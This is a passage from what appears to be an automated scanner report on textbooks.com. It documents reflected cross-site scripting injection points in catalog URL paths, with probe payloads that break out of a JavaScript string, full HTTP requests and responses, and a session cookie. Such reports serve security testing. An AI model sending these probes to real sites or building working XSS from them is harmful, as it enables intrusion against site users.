Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3652
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:06 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalogd7739';bb127e79e67/B/Business-and-Economics.php'

</script>
...[SNIP]...

1.9. http://www.textbooks.com/Catalog/B/Business-and-Economics.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/B/Business-and-Economics.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce618'%3be2864f06855 was submitted in the REST URL parameter 3. This input was echoed as ce618';e2864f06855 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/B/ce618'%3be2864f06855 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:07 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/B/ce618';e2864f06855'

</script>
...[SNIP]...

1.10. http://www.textbooks.com/Catalog/C/Communication-and-Media.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/C/Communication-and-Media.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75dad'%3b481a0315a4c was submitted in the REST URL parameter 1. This input was echoed as 75dad';481a0315a4c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog75dad'%3b481a0315a4c/C/Communication-and-Media.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3653
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:00 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog75dad';481a0315a4c/C/Communication-and-Media.php'

</script>
...[SNIP]...

1.11. http://www.textbooks.com/Catalog/C/Communication-and-Media.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/C/Communication-and-Media.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 538e3'%3bf010126a56c was submitted in the REST URL parameter 3. This input was echoed as 538e3';f010126a56c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/C/538e3'%3bf010126a56c HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:01 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/C/538e3';f010126a56c'

</script>
...[SNIP]...

1.12. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/D/Computer-Science-and-Technology.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cb83'%3bcd802c1acb8 was submitted in the REST URL parameter 1. This input was echoed as 1cb83';cd802c1acb8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog1cb83'%3bcd802c1acb8/D/Computer-Science-and-Technology.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3661
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog1cb83';cd802c1acb8/D/Computer-Science-and-Technology.php'

</script>
...[SNIP]...

1.13. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/D/Computer-Science-and-Technology.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ccc1'%3bf35221d84d8 was submitted in the REST URL parameter 3. This input was echoed as 4ccc1';f35221d84d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/D/4ccc1'%3bf35221d84d8 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/D/4ccc1';f35221d84d8'

</script>
...[SNIP]...

1.14. http://www.textbooks.com/Catalog/E/Education.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/E/Education.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e0c5'%3b8fe95fbd68d was submitted in the REST URL parameter 1. This input was echoed as 4e0c5';8fe95fbd68d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog4e0c5'%3b8fe95fbd68d/E/Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
